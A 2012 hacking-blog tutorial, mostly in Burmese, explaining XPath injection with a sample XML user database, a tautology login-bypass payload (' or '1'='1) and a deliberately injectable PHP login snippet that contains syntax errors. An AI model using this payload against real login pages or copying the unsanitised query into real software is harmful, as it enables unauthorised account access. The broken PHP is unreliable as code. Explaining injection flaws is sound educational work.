Wednesday, February 22, 2012

XPath Injection Tutorial



What is XPath Injection? 


 Webiste တစ္ခုရဲ႕ အေရးၾကီး Data ေတြကို သိမ္းဆည္းဖို႕ XML Document ေတြကို အသံုးျပဳေလ့ရွိၾကပါတယ္။ ဥပမာ . User Information ေတြ User Password ေတြေပါ့.XML Document ေတြရဲ႕အားသာခ်က္ကေတာ့ လူေတြဖတ္ရခက္တာပါပဲ. အဲ့ဒီ့ Data Base ေတြကို ခ်ိတ္ဖို႕ Xpath ( XPath Language ) ကိုအသံုးျပဳပါတယ္။ Xpath Injection ဆိုတာ ယင္း Data Base အတြင္းသို႕ By Pass လုပ္ဖို႕ၾကိဳးစားျခင္းပါပဲ.  


How XPath Work?
ပထမဆံုး User ရဲ႕ အေရးၾကီး Data Base မ်ားသိမ္းဆည္းထားေသာ XML Document တစ္ခုကို အရင္ၾကည့္ရေအာင္.။ 
<?xml version=”1.0″ encoding=”ISO-8859-1″?>
<Ghostarea_database>
<Ghostarea_user>
<username>Negative.Thunder</username>
<password>Ilovehacking</password>
<account>Administrator</account>
</Ghostarea_user>
<Ghostarea_user>
<username>Unknown</username>
<password>test1234</password>
<account>Subscriber</account>
</Ghostarea_user>
<Ghostarea_user>
<username>Anonymous</username>
<password>test123</password>
<account>Subscriber</account>
</Ghostarea_user>
</Ghostarea_database>
အေပၚကဟာကေတာ့ User Information မ်ားသိမ္းဆည္းထားေသာ XML Data base File ပါ. အကယ္၍ ကၽြန္ေတာ္တို႕က Administrator အေကာင့္ရဲ႕ Information ကိုယူမယ္ဆိုပါစို႕ ဒါဆို XML Document နဲ႕ခ်ိတ္ဖို႕ XPath Query ကို ဒီလိုေရးပါ့မယ္
string(//Ghostarea_user[username/text()='Negative.Thunder' and password/text()='ilovehacking']/account/text())
အထက္ကအတုိင္းဆိုျပႆနာမရွိပါဘူး ဒါေပမယ့္ Web Master ကမ်ား User Input ကို Filter လုပ္မထားပဲ ေအာက္ကလိုေရးလိုက္မယ္ဆိုရင္
string(//Ghostarea_user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())
Attacker ဟာ By Pass Access လုပ္ႏုိင္ပါျပီ.
Username: ‘ or ’1′ = ’1
Password: ‘ or ’1′ = ’1
ဒါဆို Attacker ဟာ Access လုပ္ႏုိင္ပါျပီ ( Simple SQL Injection Attack ) လိုပါပဲ..သူကလည္း ဒီလိုနည္းနဲ႕ပဲေပါက္သြားတာပါ  ;-)
Note : ခုနက XMP Document နဲ႕ XPath ကိုပဲျပသြားလုိက္ပါတယ္ Exploit Code ေနရာမွာ တကယ့္ Login Page ကေတာ့ ဒီလိုပါ.

<?php
$login = simplexml_load_file(“Ghostarea_database.xml”);
$result=$login->xpath(“//Ghostarea_user[username/test()='".$_POST['Ghostarea'].” AND password/text()=’”.$_POST['testing123'].”‘”;
?>

Ref : Hackloops 

power by ghostarea

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology